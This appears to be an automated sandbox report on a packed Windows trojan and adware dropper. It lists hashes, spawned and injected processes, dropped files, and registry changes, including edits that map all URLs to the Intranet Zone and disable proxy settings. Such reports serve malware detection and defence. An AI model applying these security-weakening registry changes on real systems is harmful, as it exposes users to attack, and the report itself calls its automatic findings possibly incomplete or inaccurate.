Adware.Agent.QCF (B) (Emsisoft), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: eb4a1216ea797f8bde4485f7b0580c8e
SHA1: 6a713ff3bdcdc151795c1e78fc49b0e6f5e0bcf9
SHA256: 007c79d7b1b904520a21d541ddccddb90fe37d2eef4a767512b3273372f98ad8
SSDeep: 49152:bbW/0oVqkt1lJcWbZdlIeKt3mFz6zBEd6uIcc:bbW/tEWFLolEd6uxc
Size: 2165862 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-06-10 18:00:27
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
msconfig.exe:656
%original file name%.exe:228
irsetup.exe:188
irsetup.exe:1668
chromeupdate.exe:1820
The Trojan injects its code into the following process(es):
MediaPlayer__15159_il35679.exe:1884
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process MediaPlayer__15159_il35679.exe:1884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\left_image[1].png (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\accept[1].gif (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\finish[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\cancel[1].gif (1 byte)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\amipb[1].js (29301 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\index[1].htm (8841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\decline[1].gif (1 byte)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\skip[1].gif (1 byte)
%Documents and Settings%\%current user%\Desktop\Continue installation .lnk (898 bytes)
The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7386 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)
The process irsetup.exe:188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chromeupdate.exe (1351514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\getthefile.txt (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)
The process irsetup.exe:1668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (16 bytes)
%Program Files%\Your Product\lua5.1.dll (2902 bytes)
%Program Files%\Your Product\Uninstall\IRIMG1.JPG (2 bytes)
%Program Files%\Your Product\Uninstall\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe (12280 bytes)
%Program Files%\Your Product\Uninstall\uni3.tmp (9317 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1209 bytes)
%Program Files%\Your Product\Uninstall\uninstall.xml (3475 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe (11824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
%Program Files%\Your Product\uninstall.exe (9213 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\MediaPlayer__15159_il35679.enc (7496 bytes)
%Program Files%\Your Product\Uninstall\uninstall.dat (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\msconfig.exe (16 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (0 bytes)
%Program Files%\Your Product\Uninstall\uni3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (0 bytes)
The process chromeupdate.exe:1820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7972 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)
Registry activity
The process msconfig.exe:656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 27 9F F6 F6 93 CA 7A D9 D9 71 4D D7 FB 8A 67"
[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"
The process MediaPlayer__15159_il35679.exe:1884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\Version]
"(Default)" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCR\cousins.epoxied.1]
"(Default)" = "Inst Class"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\cousins.epoxied.1\CLSID]
"(Default)" = "{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}"
[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\VersionIndependentProgID]
"(Default)" = "cousins.epoxied"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKCR\cousins.epoxied]
"(Default)" = "Inst Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\TypeLib]
"(Default)" = "{0fa5e38b-eb27-4a51-aa61-a0baf2bfc090}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCR\cousins.epoxied\CurVer]
"(Default)" = "cousins.epoxied.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\MediaPlayer__15159_il35679\DEBUG]
"Trace Level" = ""
[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}]
"(Default)" = "IBoot"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1449692446"
[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"
[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A EE 8F 0A 84 D8 F6 46 51 DB B6 5D E1 92 43 BF"
[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\TypeLib]
"(Default)" = "{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MediaPlayer__15159_il35679.exe"
[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\ProgID]
"(Default)" = "cousins.epoxied.1"
[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0]
"(Default)" = "InstallerLib"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}]
"(Default)" = "Inst Class"
[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security-zone settings so that local web nodes whose names contain no dots and are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\MediaPlayer__15159_il35679\DEBUG]
"Trace Level"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 24 A9 41 8C B4 D6 53 9D DA A4 48 EF A1 7A CC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0]
"irsetup.exe" = "Setup Application"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security-zone settings so that local web nodes whose names contain no dots and are not assigned to any zone are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The process irsetup.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 61 5A FB E4 3A A8 3F 65 D9 1D 76 7D 33 AD 77"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security-zone settings so that local web nodes whose names contain no dots and are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security-zone settings so that web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process irsetup.exe:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"HelpLink" = "http://www.yourcompany.com"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"DisplayIcon" = "%Program Files%\Your Product\uninstall.exe"
